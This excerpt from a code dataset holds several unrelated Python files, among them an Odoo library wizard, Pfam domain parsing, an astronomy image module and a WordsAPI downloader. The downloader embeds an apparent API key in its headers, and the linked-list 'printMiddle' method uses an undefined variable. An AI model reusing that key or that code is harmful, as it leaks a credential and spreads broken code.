self.type==\"student\":\n \n book_movement_search = self.env[\"op.book.movement\"].search(\n [('library_card_id', '=', library_card_id),\n ('student_id', '=', student_id),\n ('state', '=', 'issue')])\n else:\n book_movement_search = self.env[\"op.book.movement\"].search(\n [('library_card_id', '=', library_card_id),\n ('faculty_id', '=', 
faculty_id),\n ('state', '=', 'issue')]) \n \n if len(book_movement_search) < self.env[\"op.library.card\"].browse(\n library_card_id).library_card_type_id.allow_book:\n return True\n else:\n return False\n\n @api.one\n def do_issue(self):\n value = {}\n \n # CHECK IF LIBRRAY CARD DEACTIVATED\n lib_card_obj= self.env['op.library.card']\n if self.type==\"student\":\n if not lib_card_obj.sudo().search([(\"student_id\",\"=\",self.student_id.id)]):\n raise except_orm(_('Warning!'),\n _(\"Library card deactivated this student!\"))\n else:\n if not lib_card_obj.sudo().search([(\"faculty_id\",\"=\",self.faculty_id.id)]):\n raise except_orm(_('Warning!'),\n _(\"Library card deactivated this faculty!\")) \n\n \n # CHECK ALLOWED BOOKS PER LIBRARY CARD\n #RETURN FALSE IF IT REACHES THE LIMIT\n \n if any(self.check_max_issue(self.student_id.id,self.faculty_id.id, self.library_card_id.id)):\n if self.book_unit_id.state and \\\n self.book_unit_id.state == 'available':\n \n book_movement_create = {\n 'book_id': self.book_id.id,\n 'book_unit_id': self.book_unit_id.id,\n 'type': self.type,\n 'student_id': self.student_id.id or False,\n 'faculty_id': self.faculty_id.id or False,\n 'library_card_id': self.library_card_id.id,\n 'issued_date': self.issued_date,\n 'return_date': self.return_date,\n 'library_id': self.env.context.get('library_id') or False,\n 'state': 'issue',\n }\n self.env['op.book.movement'].create(book_movement_create)\n self.book_unit_id.state = 'issue'\n value = {'type': 'ir.actions.act_window_close'}\n else:\n raise Warning(_('Error!'), _(\n \"Book Unit can not be issued because it's state is : %s\") %\n (dict(book_unit.unit_states).get(\n self.book_unit_id.state)))\n else:\n if self.type ==\"student\":\n \n partner_name = self.student_id.name\n else:\n partner_name = self.faculty_id.name\n \n raise Warning(_('Error!'), _(\n 'Maximum Number of book allowed for %s is : %s') %\n (partner_name,\n self.library_card_id.library_card_type_id.allow_book))\n return value\n\n# class OpFaculty(models.Model):\n# _inherit = 'op.faculty'\n#\n# @api.multi\n# def name_get(self):\n# result = []\n# for record in self:\n# result.append([record.id, \"%s %s %s\" % (record.name, record.middle_name, record.last_name)])\n# return result\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"openeducat_library/wizards/issue_book.py","file_name":"issue_book.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353898532","text":"import random\n\nimport itertools\n\n\nclass Edge:\n\n def __init__(self, gid, source, target, length, length_m, start, end, cost, cost_s, one_way):\n self.gid = gid\n self.source = source\n self.target = target\n self.length = length\n self.length_m = length_m\n self.start = start\n self.end = end\n self.cost = cost\n self.cost_s = cost_s\n self.one_way = one_way\n self.spots = []\n\n\n def create_spot(self, spot_length, spots):\n \"\"\"\n create spots in this edge\n :param spot_length: length of spot\n :param spots:\n :return:\n \"\"\"\n self.total_spots = len(spots)\n if len(spots) == 0:\n # no parking spots\n return\n if self.length_m / spot_length < len(spots):\n # parking spots on both sides of the road\n random.seed(0)\n random.shuffle(spots)\n half = int(len(spots) / 2)\n a = spots[:half]\n b = spots[half:]\n c = list(map(sum, itertools.zip_longest(a, b, fillvalue=0)))\n self.spots = c\n else:\n # parking spots on only one side of the road\n random.seed(0)\n 
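            # seeding with 0 (as in the two-sided branch above) keeps the shuffled spot layout reproducible across runs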
random.shuffle(spots)\n self.spots = spots\n\n\n def create_drive_spot(self, spot_length):\n self.spots = [-1] * int(self.length_m / spot_length)\n\n\n def has_next_spot(self, offset, spot_length):\n if offset % spot_length < len(self.spots):\n return True\n else:\n return False\n\n def spot_status(self, offset, spot_length):\n if offset % spot_length <= len(self.spots):\n return self.spots[offset % spot_length]\n else:\n raise Exception()\n\n def __str__(self):\n return \"Edge:\" + str(self.gid) + \" \" + str(sum(self.spots))\n\n def __hash__(self):\n return hash(self.gid)\n\n def __eq__(self, other):\n return self.gid == other.gid","sub_path":"seattle_experiment/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452637479","text":"from django.contrib import admin\nimport datetime\n\n# Register your models here.\nfrom .models import Product\n\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n\texclude = ['created_by','modified_by','created_datetime','modified_datetime','user_name']\n\tdef save_model(self, request, obj, form, change):\n\t\tif not obj.pk:\n\t\t\tobj.created_by\t\t\t=\trequest.user.id\n\t\t\tobj.created_datetime\t=\tdatetime.datetime.now()\n\t\t\tif request.user.first_name !=\"\" and request.user.last_name !=\"\":\n\t\t\t\tobj.user_name\t\t=\trequest.user.first_name+\" \"+request.user.last_name\n\t\t\telse:\n\t\t\t\tobj.user_name\t\t=\trequest.user.username\n\t\t\tif \tobj.Email == \"\" or obj.Email is None:\n\t\t\t\tobj.Email\t\t\t=\trequest.user.email\t \n\t\t\tsuper().save_model(request, obj, form, change)\n\t\tif change:\n\t\t\tobj.modified_by\t\t\t\t=\trequest.user.id\n\t\t\tobj.modified_datetime\t\t=\tdatetime.datetime.now()\n\t\t\tif request.user.first_name !=\"\" and request.user.last_name !=\"\":\n\t\t\t\tobj.user_name\t\t=\trequest.user.first_name+\" \"+request.user.last_name\n\t\t\telse:\n\t\t\t\tobj.user_name\t\t\t=\trequest.user.username\n\t\t\tif \tobj.Email == \"\" or obj.Email is None:\n\t\t\t\tobj.Email\t\t\t=\trequest.user.email\n\t\t\tsuper().save_model(request, obj, form, change)\n","sub_path":"src/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106135100","text":"from hashlib import md5\nfrom random import choice\nfrom statistics import mean\nfrom string import ascii_lowercase\nfrom time import time\n\nalphabet = list(ascii_lowercase)\nalphabet_bytes = []\n\nfor letter in alphabet:\n alphabet_bytes.append(bytes(letter, 'ascii'))\n\nduration_list = []\n\nfor i in range(10):\n preimage_seed = choice(alphabet_bytes)\n test_hash = md5(preimage_seed).hexdigest()\n start_time = time()\n \n for letter in alphabet_bytes:\n if md5(letter).hexdigest() == test_hash:\n duration = time() - start_time\n duration_list.append(duration)\n print(f'{letter} is the preimage_seed! 
- {duration:.10f} seconds')\n            break\n\nprint(f'\\nAverage: {mean(duration_list):.10f} seconds')\n","sub_path":"chapter-2-hashing/exercise_2_5.py","file_name":"exercise_2_5.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"626650308","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport csv\n\ntop_disease_list = [\"上呼吸道感染\", \"小儿发热\", \"小儿消化不良\", \"小儿支气管炎\",\"小儿腹泻\"]\n\n# Data on the five most frequent diseases\n# top_disease_file = \"./../resources/top_disease_data.csv\"\n# top_disease_data = pd.read_csv(top_disease_file,sep=\"\\t\")\n\n# Data after matching patients' chief complaints against symptoms; it still covers all diseases, so the top five need to be extracted\ndisease_symptom_file = open(\"./../resources/disease_symptom.csv\",mode='r',encoding=\"utf-8\")\nsymptom_reader = csv.reader(disease_symptom_file)\n\nsave_file = open(\"./../resources/top_disease_symptom.csv\",encoding=\"utf-8\",mode=\"w\")\nwriter = csv.writer(save_file)\n\nindex = 0\nfor line in symptom_reader:\n    if line[5] in top_disease_list:\n        print(line)\n        # writer.writerow(line)\n        index += 1\nprint(index)\n\nsave_file.close()\ndisease_symptom_file.close()\n\n\n\n","sub_path":"preprocess/match_disease.py","file_name":"match_disease.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"511943956","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyproffit/data.py\n# Compiled at: 2020-04-23 04:51:54\n# Size of source mod 2**32: 9181 bytes\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import wcs\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.interpolate import griddata\n\ndef get_extnum(fitsfile):\n    next = 0\n    if fitsfile[0].header['NAXIS'] == 2:\n        return 0\n    print('Primary HDU is not an image, moving on')\n    nhdu = len(fitsfile)\n    if nhdu == 1:\n        print('Error: No IMAGE extension found in input file')\n        return -1\n    cont = 1\n    next = 1\n    while cont:\n        if next < nhdu:\n            extension = fitsfile[next].header['XTENSION']\n            if extension == 'IMAGE':\n                print('IMAGE HDU found in extension ', next)\n                cont = 0\n            else:\n                next = next + 1\n\n    if cont == 1:\n        print('Error: No IMAGE extension found in input file')\n        return -1\n    return next\n\n\nclass Data:\n\n    def __init__(self, imglink, explink=None, bkglink=None, voronoi=False, rmsmap=None):\n        if imglink is None:\n            print('Error: Image file not provided')\n            return\n        fimg = fits.open(imglink)\n        next = get_extnum(fimg)\n        self.img = fimg[next].data.astype(float)\n        head = fimg[next].header\n        self.header = head\n        self.wcs_inp = wcs.WCS(head, relax=False)\n        if 'CDELT2' in head:\n            self.pixsize = head['CDELT2'] * 60.0\n        else:\n            if 'CD2_2' in head:\n                self.pixsize = head['CD2_2'] * 60.0\n            else:\n                print('No pixel size could be found in header, will assume a pixel size of 2.5 arcsec')\n                self.pixsize = 0.041666666666666664\n        self.axes = self.img.shape\n        if voronoi:\n            self.errmap = fimg[1].data.astype(float)\n        fimg.close()\n        if explink is None:\n            self.exposure = np.ones(self.axes)\n        else:\n            fexp = fits.open(explink)\n            next = get_extnum(fexp)\n            expo = fexp[next].data.astype(float)\n            if expo.shape != self.axes:\n                print('Error: Image and exposure map sizes do not match')\n                return\n            self.exposure = expo\n            fexp.close()\n        if bkglink is None:\n            self.bkg = np.zeros(self.axes)\n        else:\n            fbkg = fits.open(bkglink)\n            next = get_extnum(fbkg)\n            bkg = 
fbkg[next].data.astype(float)\n if bkg.shape != self.axes:\n print('Error: Image and background map sizes do not match')\n return\n self.bkg = bkg\n fbkg.close()\n elif rmsmap is not None:\n frms = fits.open(rmsmap)\n next = get_extnum(frms)\n rms = frms[next].data.astype(float)\n if rms.shape != self.axes:\n print('Error: Image and RMS map sizes do not match')\n return\n self.rmsmap = rms\n frms.close()\n else:\n self.rmsmap = None\n self.filth = None\n\n def region(self, regfile):\n freg = open(regfile)\n lreg = freg.readlines()\n freg.close()\n nsrc = 0\n nreg = len(lreg)\n if self.exposure is None:\n print('No exposure given')\n return\n expo = np.copy(self.exposure)\n y, x = np.indices(self.axes)\n regtype = None\n for i in range(nreg):\n if 'fk5' in lreg[i]:\n regtype = 'fk5'\n\n if regtype is None:\n print('Error: invalid format')\n return\n for i in range(nreg):\n if 'circle' in lreg[i]:\n vals = lreg[i].split('(')[1].split(')')[0]\n if regtype == 'fk5':\n xsrc = float(vals.split(',')[0])\n ysrc = float(vals.split(',')[1])\n rad = vals.split(',')[2]\n if '\"' in rad:\n rad = float(rad.split('\"')[0]) / self.pixsize / 60.0\n else:\n if \"'\" in rad:\n rad = float(rad.split(\"'\")[0]) / self.pixsize\n else:\n rad = float(rad) / self.pixsize * 60.0\n wc = np.array([[xsrc, ysrc]])\n pixcrd = self.wcs_inp.wcs_world2pix(wc, 1)\n xsrc = pixcrd[0][0] - 1.0\n ysrc = pixcrd[0][1] - 1.0\n else:\n xsrc = float(vals.split(',')[0])\n ysrc = float(vals.split(',')[1])\n rad = float(vals.split(',')[2])\n boxsize = np.round(rad + 0.5).astype(int)\n intcx = np.round(xsrc).astype(int)\n intcy = np.round(ysrc).astype(int)\n xmin = np.max([intcx - boxsize, 0])\n xmax = np.min([intcx + boxsize + 1, self.axes[1]])\n ymin = np.max([intcy - boxsize, 0])\n ymax = np.min([intcy + boxsize + 1, self.axes[0]])\n rbox = np.hypot(x[ymin:ymax, xmin:xmax] - xsrc, y[ymin:ymax, xmin:xmax] - ysrc)\n src = np.where(rbox < rad)\n expo[ymin:ymax, xmin:xmax][src] = 0.0\n nsrc = nsrc + 1\n\n print('Excluded %d sources' % nsrc)\n self.exposure = expo\n\n def dmfilth(self, outfile=None):\n if self.img is None:\n print('No data given')\n return\n chimg = np.where(self.exposure == 0.0)\n imgc = np.copy(self.img)\n imgc[chimg] = 0.0\n print('Applying high-pass filter')\n smoothing_scale = 25\n gsb = gaussian_filter(imgc, smoothing_scale)\n gsexp = gaussian_filter(self.exposure, smoothing_scale)\n img_smoothed = np.nan_to_num(np.divide(gsb, gsexp)) * self.exposure\n print('Interpolating in the masked regions')\n y, x = np.indices(self.axes)\n nonz = np.where(img_smoothed > 0.0)\n p_ok = np.array([x[nonz], y[nonz]]).T\n vals = img_smoothed[nonz]\n int_vals = np.nan_to_num(griddata(p_ok, vals, (x, y), method='cubic'))\n print('Filling holes')\n area_to_fill = np.where(np.logical_and(int_vals > 0.0, self.exposure == 0))\n dmfilth = np.copy(self.img)\n dmfilth[area_to_fill] = np.random.poisson(int_vals[area_to_fill])\n self.filth = dmfilth\n if outfile is not None:\n hdu = fits.PrimaryHDU(dmfilth)\n hdu.header = self.header\n hdu.writeto(outfile, overwrite=True)\n print('Dmfilth image written to file ' + outfile)","sub_path":"pycfiles/pyproffit-0.4.3-py3.7/data.cpython-37.py","file_name":"data.cpython-37.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46850067","text":"import os\n\nimport requests\n\nimport datetime\n\ndef __download_word(word):\n if os.path.exists('wordsapi/{}.txt'.format(word)):\n return \"already exists\"\n \n 
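    # not cached yet: fetch the word from the WordsAPI endpoint and save the raw JSON response to wordsapi/<word>.txt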
try:\n headers = {\n \"X-Mashape-Key\": \"cJEf2iokzbmshxtkkzKrYjxR2ANkp16Jv6Vjsn5cKyHkbdwBCK\",\n \"Accept\": \"application/json\"\n }\n url = 'https://wordsapiv1.p.mashape.com/words/' + word\n r = requests.get(url, headers=headers)\n \n with open('wordsapi/{}.txt'.format(word), 'w', encoding='utf-8') as fout:\n fout.write(r.content.decode())\n return \"download successfully\"\n except Exception as e:\n return e\n\n\ndef download(word_list):\n length = len(word_list)\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n with open('diff_downloaded.txt', 'a', encoding='utf-8') as fout:\n for i, w in zip(range(1, length + 1), word_list):\n fout.write(w + '\\n')\n print(\"{:>4d}/{}: {}\".format(i, length, w))\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \ndef download_other_1208():\n with open(\"to_wordsapi.txt\", \"r\", encoding=\"utf-8\") as fin:\n t = fin.read()\n list_o = set(t.split('\\n'))\n with open('diff_downloaded.txt', 'r', encoding='utf-8') as fin:\n diff_downloaded = fin.read().split('\\n')\n i = 0\n cnt = 0\n targets = list(set(list_o) - set(diff_downloaded))\n\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n with open('diff_downloaded.txt', 'a', encoding='utf-8') as fout:\n while cnt < 2450 and i < len(targets):\n w = targets[i]\n fout.write(w + '\\n')\n print(cnt, w)\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n if ret == \"download successfully\":\n cnt += 1\n i += 1\n \n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \ndef download_other_1210():\n with open(\"to_wordsapi_1210.txt\", \"r\", encoding=\"utf-8\") as fin:\n t = fin.read()\n targets = t.split('\\n')\n\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n i = 0\n cnt = 0\n while cnt < 2450 and i < len(targets):\n w = targets[i]\n print(cnt, w)\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n if ret == \"download successfully\":\n cnt += 1\n i += 1\n \n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \n \n\nif __name__ == \"__main__\":\n '''\n with open('diff.txt', 'r', encoding='utf-8') as fin:\n diff = fin.read().split('\\n')\n with open('diff_downloaded.txt', 'r', encoding='utf-8') as fin:\n diff_downloaded = fin.read().split('\\n')\n remain = list(set(diff) - set(diff_downloaded))\n if len(remain) < 2450:\n download(remain)\n else:\n download(remain[:2450])\n '''\n download_other_1210()\n","sub_path":"download_wordsapi.py","file_name":"download_wordsapi.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"421428721","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pickle\nimport datetime\nimport csv\nimport os\nimport math\n\n# SETUP\npf_loc = '../../data/pfams/Pfam-A.regions.tsv'\nout_loc = '/'.join(pf_loc.split('/')[0:-1]) + '/'\ndigits = 6\nbase = 16\nalphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nordermag = np.array([base**i for i in range(digits)])\ncharkey = dict(zip(alphabet, range(len(alphabet))))\nhash2 = lambda x: int(np.dot(np.array([charkey[c] for c in x[2][:digits]]), 
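The __download_word helper above skips any word whose response file already exists, so reruns after a quota limit or crash are idempotent (the record also hard-codes a Mashape API key inline; reading it from an environment variable is the usual fix). A generic sketch of the same fetch-once pattern, with hypothetical URL and paths:

import os
import requests

def fetch_once(url, dest_path, headers=None):
    """Download url to dest_path unless it is already present on disk."""
    if os.path.exists(dest_path):
        return "already exists"
    resp = requests.get(url, headers=headers, timeout=30)
    resp.raise_for_status()          # surface HTTP errors instead of caching them
    with open(dest_path, "w", encoding="utf-8") as fout:
        fout.write(resp.text)
    return "download successfully"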
ordermag))\n\nname_digits = 4 # digits in name; 5 for pfams, 4 for clans\n# power must be less than (but shouldn't be by much) number of generated digits, math.log(10**name_digits, 2)*2\n# previously, chosen 24 for 5 digits (33 max), 20 for 4 digits (26 max)\nshsize = 2**20\nndigit = int(round(math.log(shsize, 2)))\ndef hashp(x):\n bstr = [bin(int(x[i][-name_digits:], base=10))[2:] for i in range(len(x))]\n bstrp = ['0'*(max([int(math.ceil(float(ndigit)/float(len(x)))) - len(el), 0])) + el for el in bstr]\n hp = int(''.join([''.join([bstrp[i][-j] for i in range(len(x))])\n for j in range(1, 1+int(math.ceil(ndigit/float(len(x)))))])[0:ndigit], base=2)\n return hp\n\nthsnow = datetime.datetime.now()\ntimestr = ( str(thsnow.month) + '-' + str(thsnow.day) + '-' +\n str(thsnow.year) + '_' + str(thsnow.hour) + 'h' + str(thsnow.minute) + 'm')\n\n# step 1: hash\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\ncounts = [[]]*(base**digits)\nfor index, row in enumerate(pf_r):\n if index > 0:\n hashi = hash2(row)\n if counts[hashi] == []:\n counts[hashi] = [[row[0], 1]]\n else:\n found = 0\n for pf in counts[hashi]:\n if pf[0] == row[0]:\n pf[1] += 1\n found = 1\n break\n if found == 0:\n counts[hashi].append([row[0], 1])\npf_f.close()\n\nout_counts = open(out_loc + 'hashing_' + timestr + '.pkl', 'wb')\npickle.dump(counts, out_counts)\npickle.dump(digits, out_counts)\npickle.dump(base, out_counts)\nout_counts.close()\n\n# step 2: count number of proteins\nnum_proteins = 0\nfor hashline in range(len(counts)):\n num_proteins += len(counts[hashline])\n\n# step 3: index by protein location\nprot_names = ['']*num_proteins\nprot_pfams = [[]]*num_proteins\ninum = 0\nfor hashline in range(len(counts)):\n for protdescr in counts[hashline]:\n prot_names[inum] = protdescr[0]\n prot_pfams[inum] = []\n inum += 1\nprot_dict = dict(zip(prot_names, range(len(prot_names))))\n\n# step 4: fill in pfams\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\nfor index, row in enumerate(pf_r):\n if index > 0:\n prot_pfams[prot_dict[row[0]]].append([row[4], int(row[5]), int(row[6])])\npf_f.close()\n\n# step 5: sort pfams within proteins\nfor proti in range(len(prot_pfams)):\n prot_pfams[proti].sort(key=lambda x: x[1])\n\n# step 6: list pfams\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\npfam_list = []\nlastrow = [0]*5\nfor index, row in enumerate(pf_r):\n if index > 0:\n if row[4] != lastrow[4]:\n pfam_list.append([row[4], 1])\n else:\n pfam_list[-1][1] += 1\n lastrow = row\npf_f.close()\npfam_dict = dict(zip([pfam_list[i][0] for i in range(len(pfam_list))], range(len(pfam_list))))\n\nout_counts = open(out_loc + 'indices_' + timestr + '.pkl', 'wb')\npickle.dump(prot_names, out_counts)\npickle.dump(prot_pfams, out_counts)\npickle.dump(prot_dict, out_counts)\npickle.dump(pfam_list, out_counts)\npickle.dump(pfam_dict, out_counts)\nout_counts.close()\n\n# add clan information\ncl_loc = '../../data/pfams/Pfam-A.clans.tsv'\ncl_f = open(cl_loc, 'r')\ncl_r = csv.reader(cl_f, delimiter='\\t')\nclan_list = []\npf2cl_list = []\nclan_descr = []\nfor index, row in enumerate(cl_r):\n if row[1] != '':\n clan = row[1]\n else:\n clan = row[0]\n # *** fix! make non-redundant. 
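The hash2 lambda above treats the first `digits` characters of the third TSV column as base-16 place values via a dot product with `ordermag`; that only stays collision-safe while the characters come from 0-9/A-F, since `charkey` maps 62 symbols but the radix is 16. The idea in isolation, taking the token directly rather than a CSV row:

import numpy as np

alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
charkey = {c: i for i, c in enumerate(alphabet)}
digits, base = 6, 16
ordermag = np.array([base ** i for i in range(digits)])

def hash_prefix(token):
    """Interpret the first `digits` characters as base-16 place values."""
    return int(np.dot([charkey[c] for c in token[:digits]], ordermag))

# 'A0C000' -> 10*16**0 + 0*16**1 + 12*16**2 = 3082
print(hash_prefix('A0C000'))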
wasting memory this way ***\n clan_list.append(clan)\n pf2cl_list.append([row[0], clan])\n clan_descr.append(row[4])\ncl_f.close()\nclan_dict = dict(zip(clan_list, range(len(clan_list))))\npfam2clan = dict(pf2cl_list)\nprot_clans = []\nfor proti, prot in enumerate(prot_pfams):\n prot_clans.append([])\n for dom in prot:\n prot_clans[proti].append([pfam2clan[dom[0]], dom[1], dom[2]])\n\nout_counts = open(out_loc + 'clan_indices_' + timestr + '.pkl', 'wb')\npickle.dump(prot_names, out_counts)\npickle.dump(prot_clans, out_counts)\npickle.dump(prot_dict, out_counts)\npickle.dump(clan_list, out_counts)\npickle.dump(clan_dict, out_counts)\npickle.dump(clan_descr, out_counts) #** new\npickle.dump(pfam2clan, out_counts)\nout_counts.close()\n\n# step 7: create clan linkage graphs\n# ***this should be fixed! lots of redundancies; clan_list is too long***\nlink_to = [[] for el in range(len(clan_list))]\nfor proti in range(len(prot_clans)):\n for pfi in range(len(prot_clans[proti]) - 1):\n if len(link_to[clan_dict[prot_clans[proti][pfi][0]]]) == 0:\n link_to[clan_dict[prot_clans[proti][pfi][0]]] = [[clan_dict[prot_clans[proti][pfi + 1][0]], 1]]\n continue\n found = 0\n for ltoi in link_to[clan_dict[prot_clans[proti][pfi][0]]]:\n if ltoi[0] == clan_dict[prot_clans[proti][pfi + 1][0]]:\n ltoi[1] += 1\n found = 1\n break\n if found == 0:\n link_to[clan_dict[prot_clans[proti][pfi][0]]].append([clan_dict[prot_clans[proti][pfi + 1][0]], 1])\n #print(link_to)\n\nout_counts = open(out_loc + 'links_' + timestr + '.pkl', 'wb')\npickle.dump(link_to, out_counts)\npickle.dump(clan_list, out_counts)\nout_counts.close()\n\n## summary statistics 1:\n# domains per protein\ndom_per_prot = [len(prot) for prot in prot_clans]\n\n# unique domains per protein\nudom_per_prot = [len(set([pdet[0] for pdet in prot])) for prot in prot_clans]\n\n# pfam coverage -> gaps between protein domains (can't get full length)\npf_gaps = []\nfor prot in prot_clans:\n for domi in range(len(prot)-1):\n pf_gaps.append(prot[domi+1][1] - prot[domi][2])\n\n# decision entropy\ndec_entropy = np.zeros(len(prot_clans))\nfor proti, prot in enumerate(prot_clans):\n if len(prot) < 2:\n continue\n pfvec = [pdet[0] for pdet in prot]\n uset = [el for el in set(pfvec)]\n umult = [sum([pfi == pfj for pfj in pfvec]) for pfi in uset]\n for pfi_i, pfi in enumerate(uset):\n nextvec = []\n for pfj_i, pfj in enumerate(pfvec[:-1]):\n if pfj == pfi:\n nextvec.append(pfvec[pfj_i+1])\n unext = [el for el in set(nextvec)]\n unextpi = [sum([pfi == pfj for pfj in nextvec])/float(len(nextvec)) for pfi in unext]\n dec_entropy[proti] += sum([-math.log(um)*um for um in unextpi])*umult[pfi_i]\n\nout_summary1 = open(out_loc + 'summary_stats1_' + timestr + '.pkl', 'wb')\npickle.dump(dom_per_prot, out_summary1)\npickle.dump(udom_per_prot, out_summary1)\npickle.dump(pf_gaps, out_summary1)\npickle.dump(dec_entropy, out_summary1)\npickle.dump(prot_names, out_summary1)\nout_summary1.close()\n\n\n# step 8: hash adjoining clans\nnhash = 2\nsethash = [[] for si in range(shsize)]\nhashloc = [[] for si in range(shsize)]\nfor proti, prot in enumerate(prot_clans):\n for domi in range(len(prot)-1):\n thsrng = range(domi, domi + nhash)\n doml = [prot[hi][0] for hi in thsrng]\n skey = doml #[int(x[-name_digits:]) for x in doml]\n\n # sort, to make sure all orders get mapped to same place\n sdomi = [x for (y,x) in sorted(zip(skey, thsrng))]\n sdoml = [x for (y,x) in sorted(zip(skey, doml))]\n hashi = hashp(sdoml)\n\n if len(hashloc[hashi]) == 0:\n hashloc[hashi] = [sdoml]\n sethash[hashi] = 
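The clan-linkage loop that follows (which the author's own comments flag as redundant) maintains [neighbour, count] pairs with a linear scan per edge; collections.Counter produces the same weighted adjacency in a few lines. A sketch over the same prot_clans layout of [clan, start, stop] triples:

from collections import defaultdict, Counter

def build_link_counts(prot_clans):
    """Count how often clan b directly follows clan a within a protein."""
    link_to = defaultdict(Counter)
    for domains in prot_clans:
        for cur, nxt in zip(domains, domains[1:]):
            link_to[cur[0]][nxt[0]] += 1
    return link_to

demo = [[['CL0001', 1, 50], ['CL0002', 60, 120], ['CL0001', 130, 200]]]
print(build_link_counts(demo))
# {'CL0001': Counter({'CL0002': 1}), 'CL0002': Counter({'CL0001': 1})}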
[[[proti, sdomi]]]\n else:\n found = False\n for subi, sub in enumerate(hashloc[hashi]):\n if sub == sdoml:\n sethash[hashi][subi].append([proti, sdomi])\n found = True\n break\n if found == False:\n hashloc[hashi].append(sdoml)\n sethash[hashi].append([[proti, sdomi]])\n\n# compile pfam pairs list from hash table\npfpairs = []\npfpairlocs = []\npairmap = [[] for el in clan_list]\ncount = 0\nfor hsi in range(shsize):\n for hsj in range(len(hashloc[hsi])):\n pfpairs.append(hashloc[hsi][hsj])\n pfpairlocs.append(sethash[hsi][hsj])\n pairmap[clan_dict[hashloc[hsi][hsj][0]]].append(count)\n if hashloc[hsi][hsj][0] != hashloc[hsi][hsj][1]:\n pairmap[clan_dict[hashloc[hsi][hsj][1]]].append(count)\n count += 1\n\nout_pairs = open(out_loc + 'pfam_pairs_' + timestr + '.pkl', 'wb')\npickle.dump(pfpairs, out_pairs)\npickle.dump(pfpairlocs, out_pairs)\npickle.dump(pairmap, out_pairs)\nout_pairs.close()\n\n## summary statistics 2:\n# count incidence of adjacent pairs of domains in either order\nordercounts = np.zeros([len(pfpairs), 2])\nfor pfi in range(len(pfpairlocs)):\n for loci in range(len(pfpairlocs[pfi])):\n if pfpairlocs[pfi][loci][1][1] > pfpairlocs[pfi][loci][1][0]:\n ordercounts[pfi][0] += 1\n else:\n ordercounts[pfi][1] += 1\n\nout_summary2 = open(out_loc + 'summary_stats2_' + timestr + '.pkl', 'wb')\npickle.dump(ordercounts, out_summary2)\npickle.dump(pfpairs, out_summary2)\nout_summary2.close()\n","sub_path":"PfamLogic/DomainParse_imp3.py","file_name":"DomainParse_imp3.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252694753","text":"# Node class \nclass Node: \n \n # Function to initialise the node object \n def __init__(self, data): \n self.data = data\n self.next = None\n \nclass LinkedList: \n \n def __init__(self): \n self.head = None\n \n def push(self, new_data): \n new_node = Node(new_data)\n new_node.next = self.head\n self.head = new_node\n \n # Function to get the middle of \n # the linked list \n def printMiddle(self): \n # first pointer to jump to element leaving one immediately after it\n # since second pointer reaches exactly the mid when first reaches the end return second pointers data\n twostep_ptr = self.head \n second_ptr = self.head\n \n if self.head:\n while(first_ptr and first_ptr.next):\n first_ptr = first_ptr.next.next\n second_ptr = second_ptr.next\n return second_ptr.data\n# Driver code \nlist1 = LinkedList() \nlist1.push(5) \nlist1.push(4) \nlist1.push(2) \nlist1.push(3) \nlist1.push(1) \nlist1.push(6)\nlist1.push(7)\nlist1.printMiddle() \n","sub_path":"Exercise_3.py","file_name":"Exercise_3.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302837543","text":"\"\"\"ouragan_opp URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n 